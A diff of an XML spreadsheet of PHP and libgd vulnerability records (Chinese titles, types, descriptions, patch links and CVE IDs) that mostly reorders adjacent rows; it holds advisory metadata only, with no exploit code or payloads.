+          <t>GD图形库2.1.1中的整数签名错误（又名libgd或libgd2）允许远程攻击者导致拒绝服务（崩溃）或可能通过精心制作的压缩gd2数据执行任意代码，从而触发基于堆的缓冲区溢出。</t>
         </is>
       </c>
       <c r="G408" t="inlineStr">
@@ -49881,7 +49877,7 @@
       </c>
       <c r="J408" t="inlineStr">
         <is>
-          <t>CVE-2017-8923</t>
+          <t>CVE-2016-3074</t>
         </is>
       </c>
       <c r="K408" t="inlineStr">
@@ -49956,7 +49952,7 @@
     <row r="409">
       <c r="A409" t="inlineStr">
         <is>
-          <t>PHP 缓冲区错误漏洞(CVE-2016-10166)</t>
+          <t>PHP zend_string_extend函数拒绝服务漏洞(CVE-2017-8923)</t>
         </is>
       </c>
       <c r="B409" t="inlineStr">
@@ -49971,20 +49967,24 @@
       </c>
       <c r="D409" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E409" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/libgd/libgd/commit/60bfb401ad5a4a8ae995dcd36372fe15c71e1a35</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=74577</t>
         </is>
       </c>
       <c r="F409" t="inlineStr">
         <is>
-          <t>GD Graphics Library（又名libgd或libgd2）是美国软件开发者Thomas Boutell所研发的一个开源的用于动态创建图像的库，它支持创建图表、图形和缩略图等。GD Graphics Library 2.2.4之前的版本中的gd_interpolation.c文件的‘_gdContributionsAlloc’函数存安全漏洞。远程攻击者可利用该漏洞造成拒绝服务。</t>
-        </is>
-      </c>
-      <c r="G409" t="inlineStr"/>
+          <t>PHP 7.1.5及之前的版本中的Zend/zend_string.h文件的‘zend_string_extend’函数存在安全漏洞，该漏洞源于程序没有阻止字符串对象的更改，导致输出负长度值。远程攻击者可利用该漏洞造成拒绝服务（应用程序崩溃）。</t>
+        </is>
+      </c>
+      <c r="G409" t="inlineStr">
+        <is>
+          <t>Vuln with Attack Code Disclosure</t>
+        </is>
+      </c>
       <c r="H409" t="inlineStr">
         <is>
           <t>云镜</t>
@@ -49997,7 +49997,7 @@
       </c>
       <c r="J409" t="inlineStr">
         <is>
-          <t>CVE-2016-10166</t>
+          <t>CVE-2017-8923</t>
         </is>
       </c>
       <c r="K409" t="inlineStr">
@@ -50072,7 +50072,7 @@
     <row r="410">
       <c r="A410" t="inlineStr">
         <is>
-          <t>PHP 整数溢出漏洞(CVE-2016-3078)</t>
+          <t>PHP exif_process_tiff_in_jpeg拒绝服务漏洞(CVE-2016-4544)</t>
         </is>
       </c>
       <c r="B410" t="inlineStr">
@@ -50087,17 +50087,17 @@
       </c>
       <c r="D410" t="inlineStr">
         <is>
-          <t>Integer Overflow</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E410" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://php.net/ChangeLg-7.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
         </is>
       </c>
       <c r="F410" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP 7.0.6之前版本中的zip扩展中的php_zip.c文件存在整数溢出漏洞。远程攻击者通过调用ZipArchive类中的‘getFromIndex’或‘getFromName’参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出和应用程序崩溃）。</t>
+          <t>PHP的ext/exif/exif.c文件中的‘exif_process_TIFF_in_JPEG’函数中存在安全漏洞，该漏洞源于程序没有验证TIFF起始数据。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
         </is>
       </c>
       <c r="G410" t="inlineStr">
@@ -50117,7 +50117,7 @@
       </c>
       <c r="J410" t="inlineStr">
         <is>
-          <t>CVE-2016-3078</t>
+          <t>CVE-2016-4544</t>
         </is>
       </c>
       <c r="K410" t="inlineStr">
@@ -50312,7 +50312,7 @@
     <row r="412">
       <c r="A412" t="inlineStr">
         <is>
-          <t>PHP 缓冲区错误漏洞(CVE-2019-9021)</t>
+          <t>PHP 缓冲区错误漏洞(CVE-2019-9023)</t>
         </is>
       </c>
       <c r="B412" t="inlineStr">
@@ -50332,12 +50332,12 @@
       </c>
       <c r="E412" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://bugs.php.net/bug.php?id=77247</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：http://www.php.net/</t>
         </is>
       </c>
       <c r="F412" t="inlineStr">
         <is>
-          <t>在PHP 5.6.40之前，7.1.26之前的7.x，7.2.14之前的7.2.x和7.3.1之前的7.3.x中发现了一个问题。PHAR扩展中PHAR读取功能中基于堆的缓冲区超量读取可能会允许攻击者在尝试解析文件名时读取超出实际数据的已分配或未分配内存，这是与CVE-2018-20783不同的漏洞。这与ext/phar/phar.c中的phar_detect_phar_fname_ext有关。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的mbstring正则表达式函数存在缓冲区溢出漏洞。攻击者可借助无效的多字节数据利用该漏洞造成内存损坏/泄露。以下版本受到影响：PHP 5.6.40之前版本，7.1.26之前的7.x版本，7.2.14之前的7.2.x版本，7.3.1之前的7.3.x版本。</t>
         </is>
       </c>
       <c r="G412" t="inlineStr">
@@ -50357,7 +50357,7 @@
       </c>
       <c r="J412" t="inlineStr">
         <is>
-          <t>CVE-2019-9021</t>
+          <t>CVE-2019-9023</t>
         </is>
       </c>
       <c r="K412" t="inlineStr">
@@ -50432,7 +50432,7 @@
     <row r="413">
       <c r="A413" t="inlineStr">
         <is>
-          <t>PHP 缓冲区错误漏洞(CVE-2019-9023)</t>
+          <t>PHP 缓冲区错误漏洞(CVE-2019-9021)</t>
         </is>
       </c>
       <c r="B413" t="inlineStr">
@@ -50452,12 +50452,12 @@
       </c>
       <c r="E413" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：http://www.php.net/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://bugs.php.net/bug.php?id=77247</t>
         </is>
       </c>
       <c r="F413" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的mbstring正则表达式函数存在缓冲区溢出漏洞。攻击者可借助无效的多字节数据利用该漏洞造成内存损坏/泄露。以下版本受到影响：PHP 5.6.40之前版本，7.1.26之前的7.x版本，7.2.14之前的7.2.x版本，7.3.1之前的7.3.x版本。</t>
+          <t>在PHP 5.6.40之前，7.1.26之前的7.x，7.2.14之前的7.2.x和7.3.1之前的7.3.x中发现了一个问题。PHAR扩展中PHAR读取功能中基于堆的缓冲区超量读取可能会允许攻击者在尝试解析文件名时读取超出实际数据的已分配或未分配内存，这是与CVE-2018-20783不同的漏洞。这与ext/phar/phar.c中的phar_detect_phar_fname_ext有关。</t>
         </is>
       </c>
       <c r="G413" t="inlineStr">
@@ -50477,7 +50477,7 @@
       </c>
       <c r="J413" t="inlineStr">
         <is>
-          <t>CVE-2019-9023</t>
+          <t>CVE-2019-9021</t>
         </is>
       </c>
       <c r="K413" t="inlineStr">
@@ -52842,7 +52842,7 @@
     <row r="433">
       <c r="A433" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8876)</t>
+          <t>PHP 安全漏洞(CVE-2015-8391)</t>
         </is>
       </c>
       <c r="B433" t="inlineStr">
@@ -52863,19 +52863,15 @@
       <c r="E433" t="inlineStr">
         <is>
           <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-http://www.php.net/ChangeLog-5.php</t>
+http://vcs.pcre.org/pcre/code/trunk/ChangeLog?view=markup</t>
         </is>
       </c>
       <c r="F433" t="inlineStr">
         <is>
-          <t>PHP中5.4.44之前的Zend/zend_exceptions.c，5.5.28之前的5.5.x和5.6.12之前的5.6.x无法验证某些Exception对象，这使远程攻击者可以拒绝服务（NULL指针取消引用和应用程序崩溃）或通过精心制作的序列化数据触发意外的方法执行。</t>
-        </is>
-      </c>
-      <c r="G433" t="inlineStr">
-        <is>
-          <t>Vuln with Attack Code Disclosure</t>
-        </is>
-      </c>
+          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本的pcre_compile.c文件中的‘pcre_compile’函数存在安全漏洞，该漏洞源于程序没有正确处理特定的‘[：’嵌套。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（CPU消耗）。PHP引用了此底层组件。</t>
+        </is>
+      </c>
+      <c r="G433" t="inlineStr"/>
       <c r="H433" t="inlineStr">
         <is>
           <t>云镜</t>
@@ -52888,7 +52884,7 @@
       </c>
       <c r="J433" t="inlineStr">
         <is>
-          <t>CVE-2015-8876</t>
+          <t>CVE-2015-8391</t>
         </is>
       </c>
       <c r="K433" t="inlineStr">
@@ -52963,7 +52959,7 @@
     <row r="434">
       <c r="A434" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8391)</t>
+          <t>PHP 安全漏洞(CVE-2015-8876)</t>
         </is>
       </c>
       <c r="B434" t="inlineStr">
@@ -52984,15 +52980,19 @@
       <c r="E434" t="inlineStr">
         <is>
           <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-http://vcs.pcre.org/pcre/code/trunk/ChangeLog?view=markup</t>
+http://www.php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F434" t="inlineStr">
         <is>
-          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本的pcre_compile.c文件中的‘pcre_compile’函数存在安全漏洞，该漏洞源于程序没有正确处理特定的‘[：’嵌套。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（CPU消耗）。PHP引用了此底层组件。</t>
-        </is>
-      </c>
-      <c r="G434" t="inlineStr"/>
+          <t>PHP中5.4.44之前的Zend/zend_exceptions.c，5.5.28之前的5.5.x和5.6.12之前的5.6.x无法验证某些Exception对象，这使远程攻击者可以拒绝服务（NULL指针取消引用和应用程序崩溃）或通过精心制作的序列化数据触发意外的方法执行。</t>
+        </is>
+      </c>
+      <c r="G434" t="inlineStr">
+        <is>
+          <t>Vuln with Attack Code Disclosure</t>
+        </is>
+      </c>
       <c r="H434" t="inlineStr">
         <is>
           <t>云镜</t>
@@ -53005,7 +53005,7 @@
       </c>
       <c r="J434" t="inlineStr">
         <is>
-          <t>CVE-2015-8391</t>
+          <t>CVE-2015-8876</t>
         </is>
       </c>
       <c r="K434" t="inlineStr">
@@ -53554,7 +53554,7 @@
     <row r="439">
       <c r="A439" t="inlineStr">
         <is>
-          <t>PHP PHP_zip.c释放后远程代码执行漏洞(CVE-2016-5773)</t>
+          <t>PHP var_unserializer.c拒绝服务漏洞(CVE-2016-7124)</t>
         </is>
       </c>
       <c r="B439" t="inlineStr">
@@ -53579,7 +53579,7 @@
       </c>
       <c r="F439" t="inlineStr">
         <is>
-          <t>PHP的5.5.37之前的zip扩展中的php_zip.c，5.6.23之前的5.6.x和7.0.8之前的7.x与反序列化实现和垃圾回收的交互不正确，这使远程攻击者可以执行任意代码或导致通过包含ZipArchive对象的精心制作的序列化数据进行的拒绝服务（使用后使用和应用程序崩溃）。</t>
+          <t>PHP中的ext/standard/var_unserializer.c文件存在安全漏洞，该漏洞源于程序没有正确处理无效的对象。远程攻击者可借助特制的序列化数据利用该漏洞造成拒绝服务。</t>
         </is>
       </c>
       <c r="G439" t="inlineStr">
@@ -53599,7 +53599,7 @@
       </c>
       <c r="J439" t="inlineStr">
         <is>
-          <t>CVE-2016-5773</t>
+          <t>CVE-2016-7124</t>
         </is>
       </c>
       <c r="K439" t="inlineStr">
@@ -53674,7 +53674,7 @@
     <row r="440">
       <c r="A440" t="inlineStr">
         <is>
-          <t>PHP var_unserializer.c拒绝服务漏洞(CVE-2016-7124)</t>
+          <t>PHP PHP_zip.c释放后远程代码执行漏洞(CVE-2016-5773)</t>
         </is>
       </c>
       <c r="B440" t="inlineStr">
@@ -53699,7 +53699,7 @@
       </c>
       <c r="F440" t="inlineStr">
         <is>
-          <t>PHP中的ext/standard/var_unserializer.c文件存在安全漏洞，该漏洞源于程序没有正确处理无效的对象。远程攻击者可借助特制的序列化数据利用该漏洞造成拒绝服务。</t>
+          <t>PHP的5.5.37之前的zip扩展中的php_zip.c，5.6.23之前的5.6.x和7.0.8之前的7.x与反序列化实现和垃圾回收的交互不正确，这使远程攻击者可以执行任意代码或导致通过包含ZipArchive对象的精心制作的序列化数据进行的拒绝服务（使用后使用和应用程序崩溃）。</t>
         </is>
       </c>
       <c r="G440" t="inlineStr">
@@ -53719,7 +53719,7 @@
       </c>
       <c r="J440" t="inlineStr">
         <is>
-          <t>CVE-2016-7124</t>
+          <t>CVE-2016-5773</t>
         </is>
       </c>
       <c r="K440" t="inlineStr">
@@ -53794,7 +53794,7 @@
     <row r="441">
       <c r="A441" t="inlineStr">
         <is>
-          <t>PHP simplestring_addn函数整数签名漏洞(CVE-2016-6296)</t>
+          <t>PHP snmp.c拒绝服务漏洞(CVE-2016-6295)</t>
         </is>
       </c>
       <c r="B441" t="inlineStr">
@@ -53809,7 +53809,7 @@
       </c>
       <c r="D441" t="inlineStr">
         <is>
-          <t>Other</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E441" t="inlineStr">
@@ -53819,7 +53819,7 @@
       </c>
       <c r="F441" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。GD是其中的一个图形扩展库组件。xmlrpc-epi是一套采用C语言开发的易于开发者使用的序列化RPC请求的API。PHP中使用的xmlrpc-epi 0.54.2及之前的版本中的simplestring.c文件中的‘simplestring_addn’函数存在整数符号错误漏洞。远程攻击者可通过向PHP xmlrpc_encode_request函数传递较长的参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的ext/snmp/snmp.c文件存在安全漏洞，该漏洞源于程序没有正确实现未序列化实施和垃圾数据回收的交互。远程攻击者可借助特制的序列化数据利用该漏洞造成拒绝服务（释放后重用和应用程序崩溃）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
         </is>
       </c>
       <c r="G441" t="inlineStr">
@@ -53839,7 +53839,7 @@
       </c>
       <c r="J441" t="inlineStr">
         <is>
-          <t>CVE-2016-6296</t>
+          <t>CVE-2016-6295</t>
         </is>
       </c>
       <c r="K441" t="inlineStr">
@@ -53914,7 +53914,7 @@
     <row r="442">
       <c r="A442" t="inlineStr">
         <is>
-          <t>PHP snmp.c拒绝服务漏洞(CVE-2016-6295)</t>
+          <t>PHP simplestring_addn函数整数签名漏洞(CVE-2016-6296)</t>
         </is>
       </c>
       <c r="B442" t="inlineStr">
@@ -53929,7 +53929,7 @@
       </c>
       <c r="D442" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Other</t>
         </is>
       </c>
       <c r="E442" t="inlineStr">
@@ -53939,7 +53939,7 @@
       </c>
       <c r="F442" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的ext/snmp/snmp.c文件存在安全漏洞，该漏洞源于程序没有正确实现未序列化实施和垃圾数据回收的交互。远程攻击者可借助特制的序列化数据利用该漏洞造成拒绝服务（释放后重用和应用程序崩溃）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。GD是其中的一个图形扩展库组件。xmlrpc-epi是一套采用C语言开发的易于开发者使用的序列化RPC请求的API。PHP中使用的xmlrpc-epi 0.54.2及之前的版本中的simplestring.c文件中的‘simplestring_addn’函数存在整数符号错误漏洞。远程攻击者可通过向PHP xmlrpc_encode_request函数传递较长的参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
         </is>
       </c>
       <c r="G442" t="inlineStr">
@@ -53959,7 +53959,7 @@
       </c>
       <c r="J442" t="inlineStr">
         <is>
-          <t>CVE-2016-6295</t>
+          <t>CVE-2016-6296</t>
         </is>
       </c>
       <c r="K442" t="inlineStr">
@@ -54394,7 +54394,7 @@
     <row r="446">
       <c r="A446" t="inlineStr">
         <is>
-          <t>PHP Bcpowmod 函数拒绝服务漏洞(CVE-2016-4538)</t>
+          <t>PHP grapheme_stripos拒绝服务漏洞(CVE-2016-4540)</t>
         </is>
       </c>
       <c r="B446" t="inlineStr">
@@ -54419,7 +54419,7 @@
       </c>
       <c r="F446" t="inlineStr">
         <is>
-          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x中修改某些数据结构，而无需考虑它们是否是_zero_，_one_，或_two_全局变量，它允许远程攻击者通过精心设计的调用导致拒绝服务或可能造成未指定的其他影响。</t>
+          <t>PHP的ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_stripos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G446" t="inlineStr">
@@ -54439,7 +54439,7 @@
       </c>
       <c r="J446" t="inlineStr">
         <is>
-          <t>CVE-2016-4538</t>
+          <t>CVE-2016-4540</t>
         </is>
       </c>
       <c r="K446" t="inlineStr">
@@ -54514,7 +54514,7 @@
     <row r="447">
       <c r="A447" t="inlineStr">
         <is>
-          <t>PHP bcpowmod 函数拒绝服务漏洞(CVE-2016-4537)</t>
+          <t>PHP xml_parse_into_struct拒绝服务漏洞(CVE-2016-4539)</t>
         </is>
       </c>
       <c r="B447" t="inlineStr">
@@ -54529,7 +54529,7 @@
       </c>
       <c r="D447" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E447" t="inlineStr">
@@ -54539,7 +54539,7 @@
       </c>
       <c r="F447" t="inlineStr">
         <is>
-          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x接受scale参数的负整数，这使远程攻击者可以导致拒绝服务或可能通过精心设计的呼叫产生未指定的其他影响。</t>
+          <t>PHP的ext/xml/xml.c中的ext_xml/xml.c中的xml_parse_into_struct函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（缓冲区读取不足和分段）错误）或可能通过第二个参数中的精心制作的XML数据产生未指定的其他影响，从而导致解析器级别为零。</t>
         </is>
       </c>
       <c r="G447" t="inlineStr">
@@ -54559,7 +54559,7 @@
       </c>
       <c r="J447" t="inlineStr">
         <is>
-          <t>CVE-2016-4537</t>
+          <t>CVE-2016-4539</t>
         </is>
       </c>
       <c r="K447" t="inlineStr">
@@ -54634,7 +54634,7 @@
     <row r="448">
       <c r="A448" t="inlineStr">
         <is>
-          <t>PHP xml_parse_into_struct拒绝服务漏洞(CVE-2016-4539)</t>
+          <t>PHP bcpowmod 函数拒绝服务漏洞(CVE-2016-4537)</t>
         </is>
       </c>
       <c r="B448" t="inlineStr">
@@ -54649,7 +54649,7 @@
       </c>
       <c r="D448" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E448" t="inlineStr">
@@ -54659,7 +54659,7 @@
       </c>
       <c r="F448" t="inlineStr">
         <is>
-          <t>PHP的ext/xml/xml.c中的ext_xml/xml.c中的xml_parse_into_struct函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（缓冲区读取不足和分段）错误）或可能通过第二个参数中的精心制作的XML数据产生未指定的其他影响，从而导致解析器级别为零。</t>
+          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x接受scale参数的负整数，这使远程攻击者可以导致拒绝服务或可能通过精心设计的呼叫产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G448" t="inlineStr">
@@ -54679,7 +54679,7 @@
       </c>
       <c r="J448" t="inlineStr">
         <is>
-          <t>CVE-2016-4539</t>
+          <t>CVE-2016-4537</t>
         </is>
       </c>
       <c r="K448" t="inlineStr">
@@ -54754,7 +54754,7 @@
     <row r="449">
       <c r="A449" t="inlineStr">
         <is>
-          <t>PHP grapheme_stripos拒绝服务漏洞(CVE-2016-4540)</t>
+          <t>PHP Bcpowmod 函数拒绝服务漏洞(CVE-2016-4538)</t>
         </is>
       </c>
       <c r="B449" t="inlineStr">
@@ -54779,7 +54779,7 @@
       </c>
       <c r="F449" t="inlineStr">
         <is>
-          <t>PHP的ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_stripos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
+          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x中修改某些数据结构，而无需考虑它们是否是_zero_，_one_，或_two_全局变量，它允许远程攻击者通过精心设计的调用导致拒绝服务或可能造成未指定的其他影响。</t>
         </is>
       </c>
       <c r="G449" t="inlineStr">
@@ -54799,7 +54799,7 @@
       </c>
       <c r="J449" t="inlineStr">
         <is>
-          <t>CVE-2016-4540</t>
+          <t>CVE-2016-4538</t>
         </is>
       </c>
       <c r="K449" t="inlineStr">
@@ -56196,7 +56196,7 @@
     <row r="461">
       <c r="A461" t="inlineStr">
         <is>
-          <t>PHP 整数溢出漏洞(CVE-2016-4073)</t>
+          <t>PHP gd.c信息泄露漏洞(CVE-2016-7127)</t>
         </is>
       </c>
       <c r="B461" t="inlineStr">
@@ -56211,18 +56211,18 @@
       </c>
       <c r="D461" t="inlineStr">
         <is>
-          <t>Integer Overflow</t>
+          <t>Information Disclosure</t>
         </is>
       </c>
       <c r="E461" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://git.php.net/?p=php-src.git;a=commit;h=64f42c73efc58e88671ad76b6b6bc8e2b62713e1</t>
+          <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：
+http://www.php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F461" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/mbstring/libmbfl/mbfl/mbfilter.c文件中的‘the mbfl_strcut’函数存在整数溢出漏洞。远程攻击者可借助特制的mb_strcut调用利用该漏洞造成拒绝服务（应用程序崩溃）或执行任意代码。以下版本受到影响：PHP 5.5.34之前版本，5.6.20之前5.6.x版本，7.0.5之前7.x版本。</t>
+          <t>PHP 5.6.25之前的ext/gd/gd.c和7.0.10之前的7.x中的imagegammacorrect函数无法正确验证gamma值，这使远程攻击者可以拒绝服务（越界写入）或通过为第二个和第三个论点提供不同的符号来产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G461" t="inlineStr">
@@ -56242,7 +56242,7 @@
       </c>
       <c r="J461" t="inlineStr">
         <is>
-          <t>CVE-2016-4073</t>
+          <t>CVE-2016-7127</t>
         </is>
       </c>
       <c r="K461" t="inlineStr">
@@ -56317,7 +56317,7 @@
     <row r="462">
       <c r="A462" t="inlineStr">
         <is>
-          <t>PHP gd.c信息泄露漏洞(CVE-2016-7127)</t>
+          <t>PHP 整数溢出漏洞(CVE-2016-4073)</t>
         </is>
       </c>
       <c r="B462" t="inlineStr">
@@ -56332,18 +56332,18 @@
       </c>
       <c r="D462" t="inlineStr">
         <is>
-          <t>Information Disclosure</t>
+          <t>Integer Overflow</t>
         </is>
       </c>
       <c r="E462" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：
-http://www.php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://git.php.net/?p=php-src.git;a=commit;h=64f42c73efc58e88671ad76b6b6bc8e2b62713e1</t>
         </is>
       </c>
       <c r="F462" t="inlineStr">
         <is>
-          <t>PHP 5.6.25之前的ext/gd/gd.c和7.0.10之前的7.x中的imagegammacorrect函数无法正确验证gamma值，这使远程攻击者可以拒绝服务（越界写入）或通过为第二个和第三个论点提供不同的符号来产生未指定的其他影响。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/mbstring/libmbfl/mbfl/mbfilter.c文件中的‘the mbfl_strcut’函数存在整数溢出漏洞。远程攻击者可借助特制的mb_strcut调用利用该漏洞造成拒绝服务（应用程序崩溃）或执行任意代码。以下版本受到影响：PHP 5.5.34之前版本，5.6.20之前5.6.x版本，7.0.5之前7.x版本。</t>
         </is>
       </c>
       <c r="G462" t="inlineStr">
@@ -56363,7 +56363,7 @@
       </c>
       <c r="J462" t="inlineStr">
         <is>
-          <t>CVE-2016-7127</t>
+          <t>CVE-2016-4073</t>
         </is>
       </c>
       <c r="K462" t="inlineStr">
@@ -56438,7 +56438,7 @@
     <row r="463">
       <c r="A463" t="inlineStr">
         <is>
-          <t>PHP拒绝服务漏洞(CVE-2016-7411)</t>
+          <t>PHP 拒绝服务漏洞(CVE-2016-7417)</t>
         </is>
       </c>
       <c r="B463" t="inlineStr">
@@ -56463,7 +56463,7 @@
       </c>
       <c r="F463" t="inlineStr">
         <is>
-          <t>PHP中的ext/standard/var_unserializer.re文件存在安全漏洞，该漏洞源于程序没有正确处理object-deserialization错误。远程攻击者可利用该漏洞造成拒绝服务（内存损坏）。</t>
+          <t>PHP 5.6.26之前的ext/spl/spl_array.c和7.0.11之前的7.x继续进行SplArray反序列化，而无需验证返回值和数据类型，这使远程攻击者可以拒绝服务或可能造成未指定的其他影响通过精心制作的序列化数据。</t>
         </is>
       </c>
       <c r="G463" t="inlineStr">
@@ -56483,7 +56483,7 @@
       </c>
       <c r="J463" t="inlineStr">
         <is>
-          <t>CVE-2016-7411</t>
+          <t>CVE-2016-7417</t>
         </is>
       </c>
       <c r="K463" t="inlineStr">
@@ -56558,7 +56558,7 @@
     <row r="464">
       <c r="A464" t="inlineStr">
         <is>
-          <t>PHP 拒绝服务漏洞(CVE-2016-7417)</t>
+          <t>PHP拒绝服务漏洞(CVE-2016-7411)</t>
         </is>
       </c>
       <c r="B464" t="inlineStr">
@@ -56583,7 +56583,7 @@
       </c>
       <c r="F464" t="inlineStr">
         <is>
-          <t>PHP 5.6.26之前的ext/spl/spl_array.c和7.0.11之前的7.x继续进行SplArray反序列化，而无需验证返回值和数据类型，这使远程攻击者可以拒绝服务或可能造成未指定的其他影响通过精心制作的序列化数据。</t>
+          <t>PHP中的ext/standard/var_unserializer.re文件存在安全漏洞，该漏洞源于程序没有正确处理object-deserialization错误。远程攻击者可利用该漏洞造成拒绝服务（内存损坏）。</t>
         </is>
       </c>
       <c r="G464" t="inlineStr">
@@ -56603,7 +56603,7 @@
       </c>
       <c r="J464" t="inlineStr">
         <is>
-          <t>CVE-2016-7417</t>
+          <t>CVE-2016-7411</t>
         </is>
       </c>
       <c r="K464" t="inlineStr">
@@ -56678,7 +56678,7 @@
     <row r="465">
       <c r="A465" t="inlineStr">
         <is>
-          <t>PHP 拒绝服务漏洞(CVE-2016-7414)</t>
+          <t>PHP 缓冲区溢出漏洞(CVE-2016-5114)</t>
         </is>
       </c>
       <c r="B465" t="inlineStr">
@@ -56693,18 +56693,17 @@
       </c>
       <c r="D465" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E465" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-http://php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F465" t="inlineStr">
         <is>
